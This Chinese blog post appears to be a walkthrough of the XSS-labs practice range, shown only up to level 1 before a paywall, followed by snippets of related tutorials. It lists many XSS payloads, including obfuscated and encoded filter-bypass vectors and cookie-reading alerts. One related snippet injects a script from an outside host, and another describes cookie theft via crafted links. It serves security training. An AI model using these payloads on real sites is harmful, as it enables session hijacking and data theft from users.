XSS-labs 实战(练习篇)

最新推荐文章于 2024-10-01 13:10:12 发布
原创 最新推荐文章于 2024-10-01 13:10:12 发布 · 311 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端 #网络安全

文章详细介绍了XSS跨站脚本攻击的不同层次,包括初体验、双引号闭合、源码函数绕过等,分析了各种防御机制并展示了如何通过编码、事件触发等方式规避限制,达到注入恶意脚本的目的。内容涵盖多种XSS注入技术和绕过策略。

目录

1.  level1初体验:

2.    level2 双引号闭合

3.   level3 源码函数有问题,单括号绕过

4.   level4 不用括号绕过

5.   level5  a标签使用

6.  level6 大小写绕过

7.   level7 空替绕过

 8.    level8 这个写完就睡觉

xss的理论篇,写了不少删删改改还未完成,先做完通关文档吧还是。

文章所用的xss-labs靶场的项目地址:GitHub - do0dl3/xss-labs: xss 跨站漏洞平台

一些弹窗代码如下:

进行xss注入时因为要注意长度限制,因此我们已长度最短的优先。

<script>alert(1)</script>
<script>confirm('1')</script>
<script>alert(1)</script>
<script>alert(/1/zyl)</script>
<script>alert(document.cookie)</script>
<script>alert([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]([+!+[]]+[])())</script>
<script>alert(String.fromCharCode(65))</script>
<ZYL/οnclick="alert('xss')">ZYL
<script zyl>alert('xss')</script>
<a href="javascript:alert('xss')">aaa</a>
<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgzKTwvc2NyaXB0Pg==>
<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>ZYL
<a href=j&#x61;v&#97script&#x3A;&#97lert(13)>ZYL
<img src=1 onerror="alert('xss')">
<img src=1 onerror=alert(document.cookie)>
<svg onload=alert(1)>
<video src=1 onerror=alert(1)>
<img/src=1/οnerrοr="alert(/xss/)">
<img/src=1/οnerrοr=alert(/xss/)>
<button onfocus=alert(1) autofocus>
<body onload=alert(1)>
<body background="javascript:alert('XSS')">
<iframe src="javascript:alert('1')"></iframe>
<iframe onload=alert(1)></iframe>
<input onfocus=alert(1) autofocus>
<input type="image" src="javascript:alert('XSS');">

#上面的确实是有点多了,这里列举几个常用的:
<svg onload=alert(1)>
<img src=1 onerror="alert(1)">
<script>alert(1)</script>

1.  level1初体验:

仔细观察图中3个箭头可以发现,我提交了一个test值,第一关是把name参数的值显示在了页面之上,直接挂在了<h2>标签一栏,并且在h4标签里显示了长度。

那么显然他是考查ss反射型漏洞,但是由于不知道服务器端对于提交的敏感字符有没有过滤,所以这里直接在name参数中赋值一个简单的弹窗来进行测试:

<script>alert('xss')</script>

可以看到代码被执行了,浏览器讲恶意代码返回了所以才能弹窗。

最低0.47元/天 解锁文章
不想出差
关注
XSS练习
haha1314的博客
07-21 945
0x00 function render (input) { return '<div>' + input + '</div>' } 没有丝毫的过滤,且在标签中很简单直接写payload <script>alert(1)</script> 0x01 function render (input) { return...
xss-labs靶场训练(10-13关)
ldzhhh的博客
05-23 1080
第十关 先用<script>alert(xss)</script>试试 这里发现一个隐藏的form表单,里面有3个隐藏的变量:t_link、t_history、t_sort。 把三个参数都传进去试试看: http://192.168.121.129/xss/level10.php?keyword=well done!&t_link=1&t_history=2&t_sort=3 发现t_sort可以传入参数,构造Payload: t_sort=<sc
XSS注入进阶练习(一)XSS-LABS通关教程
好好睡觉
02-18 3834
XSS注入靶场、XSS-LABS通关教程
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs是一个专门针对XSS的学习平台,为网络安全从业者和新手提供了丰富的练习场景,帮助他们深入理解和掌握这种攻击手段。 XSS-labs设计了一套关卡制的学习路径,由浅入深,逐步提高难度。每个关卡都代表一种或...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master`是一个深入理解和实践XSS注入的绝佳平台,它涵盖了多种XSS类型和攻击方式,通过实战提升安全测试人员的技能。在解决每个挑战的过程中,参与者不仅可以掌握如何识别和利用XSS漏洞,还能学习如何有效...
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 6万+
xss靶场一到二十关通关详细教程
XSS练习
留得半世听茶香的博客
03-05 453
文章转载自:https://blog.youkuaiyun.com/Ni9htMar3/article/details/77938899 ...
XSS练习平台
07-17
XSS练习平台、XSS练习平台XSS练习平台XSS练习平台XSS练习平台XSS练习平台
XSS练习(皮卡湫+XSS-labs+Burpsuit靶场)
weixin_64936150的博客
09-01 1719
发现我们的输入被传入到了href中,绑定给了what do you see,先试一下能不能直接给他闭合了。发现传入的参数一直被包裹,可能有符号被转义了,丢几个常见的闭合个上去看看闭合方式。这关我们登录进来后发现了输入框,还是直接尝试看能否弹窗,发现可以直接xss。测试发现双引号闭合,传入的值仍然在input中,再试一下上一题用到的事件。各种方法都尝试过了,都不可行,看源码发现判断了输入中有没有http://发现全加了下划线,大小写也无法绕过,那就只能看看加密能不能被解析了。
Xss练习(level1-10)
AmyBaby00的博客
09-04 720
Xss练习 找输入点,输出点,能往页面上写东西,写的东西可以反馈出来。例如:搜索框 “ ”双引号包裹,会被网页源代码 当作普通的字符串。不是代码执行 尖括号成对出现,闭合<> (Xss防护:就是把有危险的词组屏蔽掉) level1 找输入点:在url里面可以看到name=test,只需构造一个基本的语句,执行该语句即name=”这里就是先把input内的双引号和尖括号闭合,然后再写我们...
xss平台练习
A1956936030的博客
10-22 643
1.靶机蓝莲花BLUE-LOTUS http://117.167.136.240:10080/admin.php 默认登录密码:bluelotus 2.靶机网站 http://117.167.136.240:38001/ 找输入口 找到输入口在register 弹出框如下: 添加新的default模板并生成payload 复制payload: <script src="http://117.167.136.240:10080/myjs/s.js"></script> 成
xss靶场练习
qq_46804551的博客
11-02 355
- Pass-1 127.0.0.1/xss/level1.php?name=<script>alert(1)</script> 通过 - Pass-2 直接插入不行,引号将其包裹起了 http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><-- - Pass-3 审查元素看看 看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都
xss攻关小练习
一枚努力的蛋蛋
07-21 510
xss攻关小练习第一关第二关第三关 第一关 过关条件 payload: 第二关 这里没有对输入的值实现htmlspecialchars函数梳理,所以直接闭合绕过 在搜索框里输入payload: 第三关 ...
(网安小白)XSS靶场练习
qq_52958658的博客
05-20 357
学习记录
xss练习记录
JDWDXN的博客
10-12 491
level2 构造闭合绕过 校验代码 <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center> <form action=level2.php method=GET> <input name=keyword value="'.$s
pikachu靶场练习XSS(反射型XSS
最新发布
qq_45795768的博客
10-01 1298
get型xss的思路是找到存在漏洞的站点,设置一个含有恶意js的payload(比如获取cookie),制作成一个url,将这个url发送给需要攻击的对象,一旦对象点击,就会触发这个payload。post型xss的思路是伪造一个自动提交的页面,html文件里包含了payload,我们只需要吸引被攻击者访问这个页面,就能实现我们的的攻击。
XSS-Labs靶场入门教程:漏洞原理与练习技巧
资源摘要信息:"xss-labs靶场是一个为初学者设计的安全漏洞练习平台,专注于跨站脚本攻击(XSS)的学习和实践。XSS是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中执行恶意脚本,从而进行数据窃取、会话劫持...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值